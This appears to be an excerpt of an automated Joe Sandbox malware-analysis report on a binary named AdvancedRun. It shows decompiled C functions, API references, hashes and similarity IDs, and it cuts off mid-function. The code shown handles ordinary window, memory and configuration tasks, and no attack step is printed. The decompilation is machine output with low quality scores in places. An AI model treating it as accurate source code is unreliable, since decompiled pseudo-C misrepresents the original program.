                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$??2@??3@
                                                                  • String ID:
                                                                  • API String ID: 1252195045-0
                                                                  • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                  • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                  • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                  • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                  0x00406746
                                                                  0x00406746
                                                                  0x0040674f
                                                                  0x00406751
                                                                  0x00406752
                                                                  0x00406757
                                                                  0x00406758
                                                                  0x0040675d
                                                                  0x0040675f
                                                                  0x00406760
                                                                  0x00406765
                                                                  0x00406766
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406771
                                                                  0x00406776
                                                                  0x00406777
                                                                  0x0040677f
                                                                  0x00406781
                                                                  0x00406785
                                                                  0x00406787
                                                                  0x00406788
                                                                  0x0040678e
                                                                  0x0040678e
                                                                  0x00406790
                                                                  0x00406791
                                                                  0x00406796
                                                                  0x00406798
                                                                  0x0040679e
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067ab

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                  • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                  • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                  • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 87%
                                                                  			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                  0x0040aba8
                                                                  0x0040aba9
                                                                  0x0040abb0
                                                                  0x0040abb2
                                                                  0x0040abb5
                                                                  0x0040ac19
                                                                  0x0040ac2c
                                                                  0x0040ac2e
                                                                  0x0040ac36
                                                                  0x0040ac39
                                                                  0x0040ac39
                                                                  0x0040ac1b
                                                                  0x0040ac21
                                                                  0x0040ac21
                                                                  0x0040abb7
                                                                  0x0040abcb
                                                                  0x0040abce
                                                                  0x0040abd7
                                                                  0x0040abe6
                                                                  0x0040abf6
                                                                  0x0040abfe
                                                                  0x0040ac09
                                                                  0x0040ac0f
                                                                  0x0040ac12
                                                                  0x0040ac4f

                                                                  APIs
                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040ABBA
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                  • String ID: $
                                                                  • API String ID: 2498372239-3993045852
                                                                  • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                  • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                  • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                  • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                  0x00403a7d
                                                                  0x00403a8c
                                                                  0x00403a9c
                                                                  0x00403aba
                                                                  0x00403adf
                                                                  0x00403ae7
                                                                  0x00403af4
                                                                  0x00403af4
                                                                  0x00403ae7
                                                                  0x00403aba
                                                                  0x00403a9c
                                                                  0x00403b13

                                                                  APIs
                                                                  • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                    • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: State$CallMessageProcSendWindow
                                                                  • String ID: A
                                                                  • API String ID: 3924021322-3554254475
                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 91%
                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                  0x004034f0
                                                                  0x004034f8
                                                                  0x00403506
                                                                  0x00403516
                                                                  0x0040351c
                                                                  0x00403531
                                                                  0x00403537
                                                                  0x00403545
                                                                  0x0040354a
                                                                  0x00403556
                                                                  0x00403567
                                                                  0x00403575
                                                                  0x00403583
                                                                  0x00403583
                                                                  0x00403586
                                                                  0x00403592
                                                                  0x00403598
                                                                  0x004035ac

                                                                  APIs
                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                  • memset.MSVCRT ref: 00403537
                                                                  • _ultow.MSVCRT ref: 00403575
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset$_ultow
                                                                  • String ID: cf@$q
                                                                  • API String ID: 3448780718-2693627795
                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 83%
                                                                  			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}










                                                                  0x00402f3a
                                                                  0x00402f51
                                                                  0x00402f60
                                                                  0x00402f6f
                                                                  0x00402f78
                                                                  0x00402f7a
                                                                  0x00402f7a
                                                                  0x00402f8a
                                                                  0x00402f8f
                                                                  0x00402f94
                                                                  0x00402f99
                                                                  0x00402f9e
                                                                  0x00402f9f
                                                                  0x00402fad
                                                                  0x00402fb2
                                                                  0x00402fb2
                                                                  0x00402fc5

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402F51
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                  • String ID: .cfg
                                                                  • API String ID: 776488737-3410578098
                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                  0x00407e2d
                                                                  0x00407e46
                                                                  0x00407e48
                                                                  0x00407e4d
                                                                  0x00407e5f
                                                                  0x00407e6b
                                                                  0x00407e6f
                                                                  0x00407e75
                                                                  0x00407e7c
                                                                  0x00407e7d
                                                                  0x00407e88
                                                                  0x00407e8d
                                                                  0x00407e8e
                                                                  0x00407eaa

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407E48
                                                                  • memset.MSVCRT ref: 00407E5F
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                  • String ID: </%s>
                                                                  • API String ID: 3400436232-259020660
                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                  0x00405e0a
                                                                  0x00405e12
                                                                  0x00405e18
                                                                  0x00405e1c
                                                                  0x00405e1e
                                                                  0x00405e1e
                                                                  0x00405e24
                                                                  0x00405e2c
                                                                  0x00405e2e
                                                                  0x00405e44
                                                                  0x00405e49
                                                                  0x00405e4c
                                                                  0x00405e4d
                                                                  0x00405e68
                                                                  0x00405e74
                                                                  0x00405e74
                                                                  0x00000000
                                                                  0x00405e84
                                                                  0x00405e8c

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                  • String ID: caption
                                                                  • API String ID: 1523050162-4135340389
                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                  0x00409a4a
                                                                  0x00409a4f
                                                                  0x00409a56
                                                                  0x00409a5e
                                                                  0x00409a60
                                                                  0x00409a6e
                                                                  0x00409a6e
                                                                  0x00409a60
                                                                  0x00409a71
                                                                  0x00409a76
                                                                  0x00000000
                                                                  0x00409a78
                                                                  0x00000000
                                                                  0x00409a89

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                  • API String ID: 946536540-379566740
                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                  0x0040588e
                                                                  0x0040588f
                                                                  0x0040588f
                                                                  0x00405892
                                                                  0x00405896
                                                                  0x004058a9
                                                                  0x004058a9
                                                                  0x004058ad
                                                                  0x004058af
                                                                  0x004058b5
                                                                  0x004058b6
                                                                  0x004058b9
                                                                  0x004058c2
                                                                  0x004058c3
                                                                  0x004058c8
                                                                  0x004058d2
                                                                  0x004058d4
                                                                  0x004058d9
                                                                  0x004058e0
                                                                  0x004058ea
                                                                  0x004058ec
                                                                  0x004058ed
                                                                  0x004058f2
                                                                  0x004058f9
                                                                  0x00405902
                                                                  0x00405898
                                                                  0x00405898
                                                                  0x0040589a
                                                                  0x0040589c
                                                                  0x004058a1
                                                                  0x004058a2
                                                                  0x004058a5
                                                                  0x004058a7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004058a7
                                                                  0x00405912
                                                                  0x00405915
                                                                  0x0040591e
                                                                  0x0040591e
                                                                  0x00405907
                                                                  0x0040590b

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@memcpymemset
                                                                  • String ID:
                                                                  • API String ID: 1865533344-0
                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 35%
                                                                  			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
